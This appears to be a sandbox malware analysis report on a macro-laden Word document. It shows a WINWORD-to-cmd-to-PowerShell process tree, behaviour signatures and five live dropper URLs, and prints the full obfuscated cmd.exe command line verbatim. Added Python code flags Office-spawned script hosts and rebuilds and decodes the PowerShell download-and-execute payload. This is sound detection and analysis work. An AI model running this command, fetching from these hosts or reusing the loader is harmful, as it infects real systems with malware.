Analysis
max time kernel: 43s
max time network: 36s
platform: windows7_x64
resource: win7v200217
submitted: 15-03-2020 17:25
Static task: static1
General
Target: 0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc
Size: 87KB
MD5: e416aa320c5070df1128c8d44872aeab
SHA1: b2c6e3255697811c32bc7b461d161b9398e93a8f
SHA256: 0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488
SHA512: 8bd6ad269772e114766398c075312ac931c1fd1386887a1854336858bf0aa10fac3fd499b914e62027fd39fb40a0d8f6bd4f0fc73a1f9060e9fa78d79c269123
Malware Config
Extracted
Language: ps1
Source
URLs (exe.dropper):
  http://freshnlaundry.com/MmU
  http://bravewill.org/5VKAhr
  http://ypsifest.com/xbrYo
  http://nazarspot.com.tr/dTofA3
  http://suicidepreventionportagecounty.org/J5
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
  pid 1956 (CMd.exe), spawned by pid 1868 (WINWORD.EXE)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 1980 (powershell.exe)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 1980 (powershell.exe), 2 hits

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 1868 (WINWORD.EXE)

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 1868 (WINWORD.EXE), 2 hits

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
  pid 1956 (CMd.exe)

Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1868 (WINWORD.EXE) wrote to memory of 1956 (CMd.exe), 3 hits

Blacklisted process makes network request (7 IoCs)
  pid 1980 (powershell.exe), network flows 5, 7, 9, 10, 11, 13, 15

Office loads VBA resources, possible macro or embedded object present

Modifies system certificate store
  powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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
  Caveat: DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is the SHA-1 thumbprint of the DST Root CA X3 root certificate, and AuthRoot\Certificates entries are populated by Windows' automatic root update when a TLS handshake needs a root not yet cached locally. This write is therefore best read as a side effect of the PowerShell download attempts above, not as the payload deliberately tampering with the trust store.
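As an added example (not part of this report or of the sandbox that produced it), the Python below applies the logic behind two of the signatures above, an Office application spawning a script host and a caret-obfuscated cmd.exe command line, to constructed Sysmon-style process-creation events modelled on this report's process tree, and walks the parent chain so that the powershell.exe node is attributed back to WINWORD.EXE. The event field names, the Office and script-host lists, the caret threshold and the benign control rows are assumptions chosen for the example.

```python
import re

# Constructed sample events in Sysmon "Process Create" (event ID 1) shape, modelled
# on the process tree in this report: the WINWORD / CMd / powershell rows reuse the
# report's PIDs and image paths (the cmd.exe payload is abbreviated with "..."), the
# explorer.exe parent and the last cmd.exe row are made up as benign controls.
EVENTS = [
    {"pid": 1868, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                r'"C:\Users\Admin\AppData\Local\Temp\0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc"'},
    {"pid": 1956, "ppid": 1868,
     "image": r"C:\Windows\system32\CMd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'CMd /v^ ^ /C " Set^ ^ ^I^F^=xo^@^{r^}[{^l^l -^{^ ^JA^B^QAE(^AU^@A^%^A^G4AZ^QB3AC^0Ab@BiAGo^A^ZQBj ... '
                r'&& S^Et ^ j^Z^oY=!IF^:9=^t^!&& se^t ^ ^ ^UJ^b=^!j^Z^o^Y^:%=^9^! ... '
                r'& s^e^t ^ r^HV^e=^!^f^d^b^t^:^}^=^s^!&c^a^ll %r^HV^e% "'},
    {"pid": 1980, "ppid": 1956,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\system32\CMd.exe",
     # first characters of the payload recovered from the cmd.exe line; rest elided
     "cmdline": "powershell -e JABQAE8AUwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQA..."},
    {"pid": 2200, "ppid": 1000,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "dir C:\Users\Admin\Documents"'},
]

# Assumed allow/deny lists; a production rule would be broader (Excel, Publisher,
# wmic, regsvr32, ...) and tuned to the environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid):
    """Image names from this process up to the root, e.g. [cmd.exe, winword.exe, explorer.exe]."""
    chain = [basename(event["image"])]
    cur = event
    for _ in range(64):                      # depth cap guards against PID-reuse loops
        chain.append(basename(cur["parent_image"]))
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
    return chain


def cmdline_indicators(cmdline):
    """Cheap obfuscation / encoding tells on a raw command line."""
    hits = []
    plain = re.sub(r"\^(.)", r"\1", cmdline)          # cmd.exe drops escape carets
    carets = cmdline.count("^")
    if carets >= 10:                                   # threshold is an assumption
        hits.append(f"{carets} escape carets")
    if re.search(r"/v(?::on)?\b", plain, re.I) and re.search(r"![^!:]+:[^!=]+=[^!]*!", plain):
        hits.append("delayed-expansion string substitution (!var:a=b!)")
    if re.search(r"\bset\s+\S+=.*&&?\s*call\b", plain, re.I | re.S):
        hits.append("set ... && call %var% indirection")
    if re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{32,}", plain, re.I):
        hits.append("Base64 -EncodedCommand payload")
    return hits


def analyze(events):
    """Return one finding per suspicious process, with the reasons and its parent chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e, by_pid)
        child, parent = chain[0], chain[1]
        reasons = []
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            reasons.append(f"parent {parent} is not expected to spawn {child}")
        reasons += cmdline_indicators(e["cmdline"])
        office = next((a for a in chain[1:] if a in OFFICE_APPS), None)
        if reasons and office:
            reasons.append(f"descends from {office}")
        if reasons:
            findings.append({"pid": e["pid"], "image": child,
                             "chain": " <- ".join(chain), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f["pid"], f["chain"])
        for r in f["reasons"]:
            print("   ", r)
```

Run as written it flags pid 1956 (Office parent, carets, delayed expansion, set/call chain) and pid 1980 (encoded command, descends from winword.exe) and stays silent on the two benign rows. The parent-child pair is the robust part of the rule; the command-line tells are there to rank the hit, since legitimate scripts rarely combine `/V`, `!var:a=b!` substitution and a closing `call %var%`.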
Processes

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (pid 1868)
  Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc"
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\CMd.exe (pid 1956, child of WINWORD.EXE)
    Command line: CMd /v^ ^ /C " Set^ ^ ^I^F^=xo^@^{r^}[{^l^l -^{^ ^JA^B^QAE(^AU^@A^%^A^G4AZ^QB3AC^0Ab@BiAGo^A^ZQBj^A^H^Q^A#A^B^O^A^G^U^A^d^A^A^uAFcAZ^QB^i^AE^M^Ab^AB^x^A^G^UAbg^B0^AD^}A^J^AB^aAEMA^d^@^A^%^ACc^Aa^AB^0A^HQAcAA^6^AC(A^L@^B+AH^#A^Z^Q^Bz^AGg^Abg^B^}^A^G^EA^d^Q^Bu^AGQAc^gB^5^AC^4A^Y@BvAG0A^L@B^'^A^G^0^AVQ^BA^AGgAd^AB^0^AHA^A^Og^AvAC(AY^gBy^AGEAdgB^l^AHc^A^aQB^}^A^G@AL^g^Bv^AH^#^A^Z^@Av^ADUAVg^BL^A^EEAaAB^yAEAAa^AB^0A^HQAcA^A^6^AC(^A^L^@B^5^AHAAc@^B^x^A^G^YA^ZQB^zA^HQAL^gB^jAG(AbQ^Av^AHg^AY^g^B^yAF^k^A^b^@^B^A^AGg^A^d^A^B0^AHAA^O^gAvAC(^Ab^gB[^A^H^o^A^Y^Q^B^y^A^HM^AcABv^AH^Q^A^L^gB^jA^G(AbQAu^A^H^QAc^gAvA^GQ^AV^A^Bv^AGY^AQQ^A^zA^EAAa^A^B^0A^HQAcA^A6AC(^AL@Bz^A^HU^A^a^Q^Bj^AGkA^Z^A^B^l^A^HA^AcgBlAHY^A^ZQB^u^A^HQA^a^Q^Bv^A^G^4^Ac^ABvA^H#AdA^B^[A^GcAZ^Q^Bj^A^G(^AdQ^B^u^AH^QA{QA^u^AG(^Acg^Bn^AC(A^SgA1^ACcA^L^g^BTA^HA^A^b^A^B^x^A^HQ^AK^AAnAEAA^J@^AxA^D}AJAB^+A^EYAVgAg^AD0^A#^A^AnA^DgA^M@^A^,ACc^A^O^@AkAF^UA{gB^xA^D0^AJABlAG4A^d^gA6A^HAA^dQB^i^AG@^A^aQBj^AC}^AJ@^BcACcAK^@A^k^AG^YARg^B^WAC}A^J@AuA^G^U^A^{ABlACc^A^O@^B+^AG(AcgB^lAG^E^AY@Bo^AC^g^A^JA^Br^AE^Y^AWgAg^A^G^k^A^bgAgACQAW^g^BD^AHc^A^KQ^B7AH^Q^Ac^g^B5AH}^AJ^A^BQ^AE(^AU^@^AuAE^QAb@B^3^A^G^4Ab^ABv^AG^E^A^Z^A^BGA^G^kA^b^A^B^l^AC^gAJA^Br^A^E^Y^AWgA^}AC^A^AJA^BV^A^H^oA^a^QA^x^A^D^}^AS^Q^B^uA^H^YAb^@BrAG^UA^LQBJA^HQA^ZQB^9^ACA^AJABVA^HoAa^QA^7A^G^#Ac^gB^l^AGEAa^@^A7^AH0^A^Y@B[^A^H^Q^A^Y^@^Bo^A^H^}A)QB^%^AC^A^A^#^AAg^ACA^A^#^A^AgAC^A^A#^AA^g^ACA^A^#^AA^g^AC^AA^#AA^g^ACA^A^#A^A=&& S^Et ^ j^Z^oY=!IF^:9=^t^!&& se^t ^ ^ ^UJ^b=^!j^Z^o^Y^:%=^9^!& S^E^T X^G^u=^!^U^J^b:)^=^f^!&& Se^T h^1^Q^2=^!X^G^u^:^x^=^p!&& Se^t ^ ^ ^SO^8Q=^!h^1^Q^2^:^#=I^!&& s^e^t ^ ^ ^gS=^!^SO^8Q^:(^=^8^!&& se^t ^p^9r=!^g^S^:^{=^e!&& S^Et ^ ^d^z=^!^p^9r^:^@^=^w^!&& SeT ^ ^K^S0=^!^d^z:^,^=2^!&& S^ET ^ D^x^8k=!^K^S0^:^'^=N^!&& s^E^T xF0=!D^x^8^k^:^[^=h!&&S^E^t ^ fd^b^t=!^x^F^0^:^+^=^m!& s^e^t ^ r^HV^e=^!^f^d^b^t^:^}^=^s^!&c^a^ll %r^HV^e% "
    - Process spawned unexpected child process
    - An obfuscated cmd.exe command-line is typically used to evade detection.

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 1980, child of CMd.exe)
      Command line: powershell -e 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
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      - Modifies system certificate store
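The CMd.exe command line above is the well-known cmd.exe delayed-expansion obfuscation: every character of a `set` value may be escaped with `^`, a chain of `set var2=!var1:x=y!` statements swaps placeholder characters back one at a time (with `/V` enabling `!var!` expansion), and a final `call %var%` runs the rebuilt string. The Python below is an example added to this page, not tooling from the sandbox vendor or the malware author. It emulates just enough of cmd.exe to recover the `powershell -e ...` line from the captured command, then decodes the Base64 UTF-16LE payload. It assumes the documented cmd.exe behaviour that an undefined `%var%` typed at a prompt (or via `cmd /C`) is left as literal text, and that no literal `&` occurs inside the set values (true for a Base64 payload); the CAPTURED constant is the command line from the process tree, copied verbatim and only split at its statement boundaries.

```python
import base64
import re

# The CMd.exe command line captured in this report's process tree, verbatim,
# split at its "&&" / "&" statement boundaries for readability.
CAPTURED = (
    r'''CMd /v^ ^ /C " Set^ ^ ^I^F^=xo^@^{r^}[{^l^l -^{^ ^JA^B^QAE(^AU^@A^%^A^G4AZ^QB3AC^0Ab@BiAGo^A^ZQBj^A^H^Q^A#A^B^O^A^G^U^A^d^A^A^uAFcAZ^QB^i^AE^M^Ab^AB^x^A^G^UAbg^B0^AD^}A^J^AB^aAEMA^d^@^A^%^ACc^Aa^AB^0A^HQAcAA^6^AC(A^L@^B+AH^#A^Z^Q^Bz^AGg^Abg^B^}^A^G^EA^d^Q^Bu^AGQAc^gB^5^AC^4A^Y@BvAG0A^L@B^'^A^G^0^AVQ^BA^AGgAd^AB^0^AHA^A^Og^AvAC(AY^gBy^AGEAdgB^l^AHc^A^aQB^}^A^G@AL^g^Bv^AH^#^A^Z^@Av^ADUAVg^BL^A^EEAaAB^yAEAAa^AB^0A^HQAcA^A^6^AC(^A^L^@B^5^AHAAc@^B^x^A^G^YA^ZQB^zA^HQAL^gB^jAG(AbQ^Av^AHg^AY^g^B^yAF^k^A^b^@^B^A^AGg^A^d^A^B0^AHAA^O^gAvAC(^Ab^gB[^A^H^o^A^Y^Q^B^y^A^HM^AcABv^AH^Q^A^L^gB^jA^G(AbQAu^A^H^QAc^gAvA^GQ^AV^A^Bv^AGY^AQQ^A^zA^EAAa^A^B^0A^HQAcA^A6AC(^AL@Bz^A^HU^A^a^Q^Bj^AGkA^Z^A^B^l^A^HA^AcgBlAHY^A^ZQB^u^A^HQA^a^Q^Bv^A^G^4^Ac^ABvA^H#AdA^B^[A^GcAZ^Q^Bj^A^G(^AdQ^B^u^AH^QA{QA^u^AG(^Acg^Bn^AC(A^SgA1^ACcA^L^g^BTA^HA^A^b^A^B^x^A^HQ^AK^AAnAEAA^J@^AxA^D}AJAB^+A^EYAVgAg^AD0^A#^A^AnA^DgA^M@^A^,ACc^A^O^@AkAF^UA{gB^xA^D0^AJABlAG4A^d^gA6A^HAA^dQB^i^AG@^A^aQBj^AC}^AJ@^BcACcAK^@A^k^AG^YARg^B^WAC}A^J@AuA^G^U^A^{ABlACc^A^O@^B+^AG(AcgB^lAG^E^AY@Bo^AC^g^A^JA^Br^AE^Y^AWgAg^A^G^k^A^bgAgACQAW^g^BD^AHc^A^KQ^B7AH^Q^Ac^g^B5AH}^AJ^A^BQ^AE(^AU^@^AuAE^QAb@B^3^A^G^4Ab^ABv^AG^E^A^Z^A^BGA^G^kA^b^A^B^l^AC^gAJA^Br^A^E^Y^AWgA^}AC^A^AJA^BV^A^H^oA^a^QA^x^A^D^}^AS^Q^B^uA^H^YAb^@BrAG^UA^LQBJA^HQA^ZQB^9^ACA^AJABVA^HoAa^QA^7A^G^#Ac^gB^l^AGEAa^@^A7^AH0^A^Y@B[^A^H^Q^A^Y^@^Bo^A^H^}A)QB^%^AC^A^A^#^AAg^ACA^A^#^A^AgAC^A^A#^AA^g^ACA^A^#^AA^g^AC^AA^#AA^g^ACA^A^#A^A='''
    r'&& S^Et ^ j^Z^oY=!IF^:9=^t^!'
    r'&& se^t ^ ^ ^UJ^b=^!j^Z^o^Y^:%=^9^!'
    r'& S^E^T X^G^u=^!^U^J^b:)^=^f^!'
    r'&& Se^T h^1^Q^2=^!X^G^u^:^x^=^p!'
    r'&& Se^t ^ ^ ^SO^8Q=^!h^1^Q^2^:^#=I^!'
    r'&& s^e^t ^ ^ ^gS=^!^SO^8Q^:(^=^8^!'
    r'&& se^t ^p^9r=!^g^S^:^{=^e!'
    r'&& S^Et ^ ^d^z=^!^p^9r^:^@^=^w^!'
    r'&& SeT ^ ^K^S0=^!^d^z:^,^=2^!'
    r"&& S^ET ^ D^x^8k=!^K^S0^:^'^=N^!"
    r'&& s^E^T xF0=!D^x^8^k^:^[^=h!'
    r'&&S^E^t ^ fd^b^t=!^x^F^0^:^+^=^m!'
    r'& s^e^t ^ r^HV^e=^!^f^d^b^t^:^}^=^s^!'
    r'&c^a^ll %r^HV^e% "'
)


def unescape_carets(text):
    """cmd.exe drops each escape caret and keeps the character after it (^^ -> ^)."""
    return re.sub(r'\^(.)', r'\1', text, flags=re.S)


def expand(value, env):
    """Expand %var% and delayed !var! / !var:search=repl! references against env.

    Simplification (assumption): real cmd.exe runs %-expansion once over the whole
    line before splitting statements. Per-statement expansion gives the same result
    here because the only paired %...% inside the payload names a variable that is
    never defined, and at a prompt / via cmd /C an undefined %var% stays literal.
    """
    def percent(m):
        return env.get(m.group(1).lower(), m.group(0))      # undefined -> literal

    def delayed(m):
        name, search, repl = m.group(1), m.group(2), m.group(3)
        val = env.get(name.lower(), '')                       # undefined -> empty
        if search is not None:
            # !var:search=repl! replaces every occurrence, case-insensitively
            val = re.sub(re.escape(search), lambda _: repl, val, flags=re.I)
        return val

    value = re.sub(r'%([^%]+)%', percent, value)
    return re.sub(r'!([^!:]+?)(?::([^=!]+)=([^!]*))?!', delayed, value)


def deobfuscate_cmd(cmdline):
    """Emulate cmd /V /C "set ...&& set ...&& call %var%" and return what call runs."""
    m = re.search(r'/[cCkK]\s*"(.*)"\s*$', cmdline, re.S)
    body = unescape_carets(m.group(1) if m else cmdline)
    env = {}
    for stmt in re.split(r'\s*&&?\s*', body):               # assumes no literal & in values
        verb, _, rest = stmt.strip().partition(' ')
        if verb.lower() == 'set':
            name, _, val = rest.partition('=')
            env[name.strip().lower()] = expand(val, env)
        elif verb.lower() == 'call':
            return expand(rest, env).strip()
    return None


def decode_encoded_command(cmdline):
    """Decode the Base64 UTF-16LE payload of powershell -e / -ec / -enc / -EncodedCommand."""
    m = re.search(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', cmdline, re.I)
    if not m:
        return None
    b64 = m.group(1)
    b64 += '=' * (-len(b64) % 4)          # sandbox captures are sometimes cut short; re-pad
    return base64.b64decode(b64).decode('utf-16-le', errors='replace')


if __name__ == '__main__':
    cmd = deobfuscate_cmd(CAPTURED)
    print(cmd)
    print(decode_encoded_command(cmd))
```

Running it reproduces the powershell.exe node of the tree, `powershell -e JAB...`, and the decoded script opens with `$POS=new-object Net.WebClient;` followed by the five `exe.dropper` URLs listed under Malware Config, joined with `@` and split in a download-and-execute loop. Two points worth carrying into your own tooling: the substitution order matters (the script maps `9` to `t` before it maps `%` to `9`, so replaying the chain out of order corrupts the Base64), and `!var:a=b!` is case-insensitive in cmd.exe, which is why the emulation uses `re.I`.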